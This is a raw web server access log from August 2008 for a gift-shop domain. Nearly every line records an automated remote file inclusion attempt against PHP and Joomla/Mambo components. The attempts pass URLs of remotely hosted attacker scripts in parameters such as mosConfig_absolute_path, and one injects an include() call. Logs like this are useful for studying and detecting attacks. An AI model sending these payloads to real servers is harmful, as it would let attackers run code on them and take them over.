74.6.17.176 - - [27/Aug/2008:05:23:12 -0700] "GET /logs/access_080608.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:23:48 -0700] "GET /logs/access_080606.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:23:48 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:23:48 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:23:54 -0700] "GET /logs/access_080719.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:24:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:24:00 -0700] "GET /logs/access_080710.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:24:00 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:12 -0700] "GET /logs//index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:12 -0700] "GET //index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:42 -0700] "GET /logs//index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:42 -0700] "GET //index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:42 -0700] "GET /logs//index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:25:43 -0700] "GET //index.php?sayfa=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:26:06 -0700] "GET /logs/scripts.log//admin/classes/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:26:06 -0700] "GET //admin/classes/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:26:06 -0700] "GET /logs//admin/classes/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:26:53 -0700] "GET /logs/access.log/errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:26:53 -0700] "GET /errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:26:53 -0700] "GET /logs/errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:26:57 -0700] "GET /logs/access_080710.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
80.93.62.106 - - [27/Aug/2008:05:27:06 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
80.93.62.106 - - [27/Aug/2008:05:27:07 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:27:27 -0700] "GET /logs/access.log/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:27:28 -0700] "GET /errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:27:28 -0700] "GET /logs/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:27:48 -0700] "GET /logs/access.log//errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:27:48 -0700] "GET /logs//errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
85.114.130.225 - - [27/Aug/2008:05:27:49 -0700] "GET //errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:28:08 -0700] "GET /logs/access.log//errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:28:08 -0700] "GET //errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:28:09 -0700] "GET /logs//errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:35 -0700] "GET /logs/errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:35 -0700] "GET /errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:35 -0700] "GET /logs/errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:36 -0700] "GET /errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:37 -0700] "GET /logs/errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:38 -0700] "GET /errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:40 -0700] "GET /logs/errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:29:40 -0700] "GET /errors.php?error=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:30:12 -0700] "GET /logs/access_080727.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:30:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:30:50 -0700] "GET /logs/access_080719.log//admin/classes/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:31:07 -0700] "GET /logs/access_080606.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:31:08 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:31:09 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:31:09 -0700] "GET /errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:31:09 -0700] "GET /logs/access_080710.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:05:31:13 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:05:31:36 -0700] "GET /logs/access_080719.log/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:05:32:01 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:05:31:56 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "morningstargifts.com"
200.49.100.20 - - [27/Aug/2008:05:31:57 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://veldink.com/mine/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:33:49 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:33:49 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:33:49 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
83.240.164.232 - - [27/Aug/2008:05:34:25 -0700] "GET /logs//errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
83.240.164.232 - - [27/Aug/2008:05:34:25 -0700] "GET //errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
83.240.164.232 - - [27/Aug/2008:05:34:25 -0700] "GET /logs/access.log//errors.php?error=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:05:35:29 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
84.54.137.9 - - [27/Aug/2008:05:37:28 -0700] "GET /logs/access_080710.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:38:58 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:38:58 -0700] "GET /?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:38:58 -0700] "GET /logs/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "morningstargifts.com"
207.58.137.81 - - [27/Aug/2008:05:39:48 -0700] "GET /phphtml.php?htmlclass_path=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:40:10 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:40:10 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:40:11 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:41:11 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:41:11 -0700] "GET /?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:41:11 -0700] "GET /logs/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 200 4926 "-" "libwww-perl/5.53" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:18 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:18 -0700] "GET //index.php?DOCUMENT_ROOT=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:19 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:19 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:19 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:42:24 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:43:12 -0700] "GET /logs/access.log/?sourcedir=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:43:12 -0700] "GET /?sourcedir=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:43:13 -0700] "GET /logs/?sourcedir=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "www.morningstargifts.com"
72.9.248.162 - - [27/Aug/2008:05:44:20 -0700] "GET /errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:44:26 -0700] "GET /logs/errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:44:27 -0700] "GET /errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:44:39 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:44:39 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:50 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:50 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:50 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:51 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:51 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:51 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:51 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:05:44:52 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:45:46 -0700] "GET /logs/?sourcedir=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:05:45:47 -0700] "GET /?sourcedir=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:47:23 -0700] "GET /logs//index.php?conf=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:47:23 -0700] "GET //index.php?conf=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:47:24 -0700] "GET /logs//index.php?conf=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
193.142.215.12 - - [27/Aug/2008:05:47:25 -0700] "GET //index.php?conf=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:48:21 -0700] "GET /logs/access_080727.log/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:48:21 -0700] "GET /?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 200 763 "-" "libwww-perl/5.53" "www.morningstargifts.com"
66.221.68.20 - - [27/Aug/2008:05:48:22 -0700] "GET /logs/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.0" 200 4926 "-" "libwww-perl/5.53" "www.morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:48:59 -0700] "GET /logs/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:48:59 -0700] "GET /logs/access_080727.log/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:48:59 -0700] "GET /?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.52.137.82 - - [27/Aug/2008:05:49:28 -0700] "GET /logs/access_080727.log%20/?mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:50:45 -0700] "GET //include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:05:51:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:51:39 -0700] "GET /logs//include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:51:39 -0700] "GET //include/admin.php?rd=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
207.58.137.81 - - [27/Aug/2008:05:51:59 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
